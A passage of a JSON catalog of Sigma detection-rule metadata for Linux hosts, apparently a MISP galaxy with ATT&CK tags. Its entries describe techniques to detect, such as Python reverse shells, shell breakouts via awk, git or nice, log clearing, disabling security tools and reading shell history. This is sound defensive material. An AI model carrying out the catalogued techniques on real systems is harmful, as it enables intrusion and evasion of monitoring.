"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "74c01ace-0152-4094-8ae2-6fd776dd43e5", "value": "File or Folder Permissions Change" }, { "description": "Detect changes of syslog daemons configuration files", "meta": { "author": "Mikhail Larin, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate administrative activity" ], "filename": "lnx_auditd_logging_config_change.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "self experience", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_logging_config_change.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.006" ] }, "related": [ { "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c830f15d-6f6e-430f-8074-6f73d6807841", "value": "Logging Configuration Changes on Linux Host" }, { "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\nThis rule detect using dd and truncate to add a junk data to file.\n", "meta": { "author": "Igor Fits, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_binary_padding.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_binary_padding.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.001" ] }, "related": [ { "dest-uuid": "5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", "value": "Binary Padding - Linux" }, { "description": "Detects commandline operations on shell history files", "meta": { "author": "Mikhail Larin, oscd.community", "creation_date": "2020-10-17", "falsepositive": [ "Legitimate administrative activity", "Legitimate software, cleaning hist file" ], "filename": "lnx_auditd_susp_histfile_operations.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml" ], "tags": [ "attack.credential-access", "attack.t1552.003" ] }, "related": [ { "dest-uuid": "8187bd2a-866f-4457-9009-86b0ddedffa3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eae8ce9f-bde9-47a6-8e79-f20d18419910", "value": "Suspicious History File Operations - Linux" }, { "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.\n", "meta": { "author": "Pawel Mazur", "creation_date": "2021-11-02", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_load_module_insmod.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://linux.die.net/man/8/insmod", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", "https://man7.org/linux/man-pages/man8/kmod.8.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1547.006" ] }, "related": [ { "dest-uuid": "a1b52199-c8c5-438a-9ded-656f1d0888c6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "106d7cbd-80ff-4985-b682-a7043e5acb72", "value": "Loading of Kernel Module via Insmod" }, { "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", "meta": { "author": "Igor Fits, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Legitimate administrative activity" ], "filename": "lnx_auditd_split_file_into_pieces.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml" ], "tags": [ "attack.exfiltration", "attack.t1030" ] }, "related": [ { "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", "value": "Split A File Into Pieces - Linux" }, { "description": "Detects calls to hidden files or files located in hidden directories in NIX systems.", "meta": { "author": "David Burkett, @signalblur", "creation_date": "2022-12-30", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_hidden_binary_execution.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.001" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e1bef8d-0fff-46f6-8465-9aa54e128c1e", "value": "Use Of Hidden Paths Or Files" }, { "description": "Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion", "meta": { "author": "Ömer Günal, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_clear_logs.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.002" ] }, "related": [ { "dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "80915f59-9b56-4616-9de0-fd0dea6c12fe", "value": "Clear Linux Logs" }, { "description": "Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.\nThis behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT\n", "meta": { "author": "David Burkett (@signalblur)", "creation_date": "2024-04-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_pnscan_binary_cli_pattern.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.virustotal.com/gui/file/beddf70a7bab805f0c0b69ac0989db6755949f9f68525c08cb874988353f78a9/content", "https://intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf", "https://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence", "https://regex101.com/r/RugQYK/1", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_pnscan_binary_cli_pattern.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "97de11cd-4b67-4abf-9a8b-1020e670aa9e", "value": "Pnscan Binary Data Transmission Activity" }, { "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-15", "falsepositive": [ "Administrator interacting with immutable files (e.g. for instance backups)." ], "filename": "proc_creation_lnx_chattr_immutable_removal.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222.002" ] }, "related": [ { "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34979410-e4b5-4e5d-8cfb-389fdff05c12", "value": "Remove Immutable File Attribute" }, { "description": "Detects the creation of a new named pipe using the \"mkfifo\" utility in a potentially suspicious location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk", "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml" ], "tags": [ "attack.execution" ] }, "uuid": "999c3b12-0a8c-40b6-8e13-dd7d62b75c7a", "value": "Potentially Suspicious Named Pipe Created Via Mkfifo" }, { "description": "Detects the execution of \"awk\" or it's sibling commands, to invoke a shell using the system() function.\nThis behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_awk_shell_spawn.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/mawk/#shell", "https://gtfobins.github.io/gtfobins/awk/#shell", "https://gtfobins.github.io/gtfobins/nawk/#shell", "https://gtfobins.github.io/gtfobins/gawk/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_awk_shell_spawn.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c1a5675-cb85-452f-a298-b01b22a51856", "value": "Suspicious Invocation of Shell via AWK - Linux" }, { "description": "Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.\n", "meta": { "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_python_reverse_shell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.revshells.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml" ], "tags": [ "attack.execution" ] }, "uuid": "32e62bc7-3de0-4bb1-90af-532978fe42c0", "value": "Python Reverse Shell Execution Via PTY And Socket Modules" }, { "description": "Detects the creation of a new named pipe using the \"mkfifo\" utility", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_mkfifo_named_pipe_creation.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk", "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml" ], "tags": [ "attack.execution" ] }, "uuid": "9d779ce8-5256-4b13-8b6f-b91c602b43f4", "value": "Named Pipe Created Via Mkfifo" }, { "description": "Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_local_account.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_account.yml" ], "tags": [ "attack.discovery", "attack.t1087.001" ] }, "related": [ { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c", "value": "Local System Accounts Discovery - Linux" }, { "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n", "meta": { "author": "Ömer Günal, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_at_command.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_at_command.yml" ], "tags": [ "attack.persistence", "attack.t1053.002" ] }, "related": [ { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", "value": "Scheduled Task/Job At" }, { "description": "Detects execution of the \"esxcli\" command with the \"system\" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.", "meta": { "author": "Cedric Maurugeon", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_esxcli_system_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1033", "attack.t1007" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e80273e1-9faf-40bc-bd85-dbaff104c4e9", "value": "ESXi System Information Discovery Via ESXCLI" }, { "description": "Detects usage of system utilities to discover files and directories", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_lnx_file_and_directory_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", "value": "File and Directory Discovery - Linux" }, { "description": "Detects usage of system utilities to discover system network connections", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_lnx_system_network_connections_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1049" ] }, "related": [ { "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", "value": "System Network Connections Discovery - Linux" }, { "description": "Detects disabling security tools", "meta": { "author": "Ömer Günal, Alejandro Ortuno, oscd.community", "creation_date": "2020-06-17", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_security_tools_disabling.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e3a8a052-111f-4606-9aee-f28ebeb76776", "value": "Disabling Security Tools" }, { "description": "Detects the use of the \"nice\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_nice_shell_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html", "https://gtfobins.github.io/gtfobins/nice/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nice_shell_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "093d68c7-762a-42f4-9f46-95e79142571a", "value": "Shell Execution via Nice - Linux" }, { "description": "Detects the command line executed when TeamViewer starts a session started by a remote host.\nOnce a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.\n", "meta": { "author": "Josh Nickels, Qi Nan", "creation_date": "2024-03-11", "falsepositive": [ "Legitimate usage of TeamViewer" ], "filename": "proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml" ], "tags": [ "attack.initial-access", "attack.t1133" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d", "value": "Remote Access Tool - Team Viewer Session Started On Linux Host" }, { "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-14", "falsepositive": [ "Legitimate software that uses these patterns" ], "filename": "proc_creation_lnx_susp_interactive_bash.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1059.004", "attack.t1036" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", "value": "Interactive Bash Suspicious Children" }, { "description": "Detects suspicious change of file privileges with chown and chmod commands", "meta": { "author": "Ömer Günal", "creation_date": "2020-06-16", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_setgid_setuid.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://attack.mitre.org/techniques/T1548/001/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" ], "tags": [ "attack.persistence", "attack.t1548.001" ] }, "related": [ { "dest-uuid": "6831414d-bb70-42b7-8030-d4e06b2660c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", "value": "Setuid and Setgid" }, { "description": "Detects usage of crontab to list the tasks of the user", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Legitimate use of crontab" ], "filename": "proc_creation_lnx_crontab_enumeration.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml" ], "tags": [ "attack.discovery", "attack.t1007" ] }, "related": [ { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "403ed92c-b7ec-4edd-9947-5b535ee12d46", "value": "Crontab Enumeration" }, { "description": "Detects system information discovery commands", "meta": { "author": "Ömer Günal, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_system_info_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", "value": "System Information Discovery" }, { "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-10-15", "falsepositive": [ "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." ], "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/Azure/Azure-Sentinel/pull/3059", "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" ], "tags": [ "attack.privilege-escalation", "attack.initial-access", "attack.execution", "attack.t1068", "attack.t1190", "attack.t1203" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "21541900-27a9-4454-9c4c-3f0a4240344a", "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand" }, { "description": "Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.", "meta": { "author": "Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure])", "creation_date": "2020-10-21", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_susp_network_utilities_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/projectdiscovery/naabu", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", "https://github.com/Tib3rius/AutoRecon", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3e102cd9-a70d-4a7a-9508-403963092f31", "value": "Linux Network Service Scanning Tools Execution" }, { "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-15", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_base64_shebang_cli.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS", "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", "value": "Linux Base64 Encoded Shebang In CLI" }, { "description": "Detects the use of the \"git\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_git_shell_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/git/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_git_shell_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "47b3bbd4-1bf7-48cc-84ab-995362aaa75a", "value": "Shell Execution via Git - Linux" }, { "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_susp_history_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/sleventyeleven/linuxprivchecker/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml" ], "tags": [ "attack.reconnaissance", "attack.t1592.004" ] }, "related": [ { "dest-uuid": "774ad5bb-2366-4c13-a8a9-65e50b292e7c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", "value": "Print History File Contents" }, { "description": "Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.", "meta": { "author": "@d4ns4n_ (Wuerth-Phoenix)", "creation_date": "2023-05-30", "falsepositive": [ "Some false positives are to be expected on user or administrator machines. Apply additional filters as needed." ], "filename": "proc_creation_lnx_susp_sensitive_file_access.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ 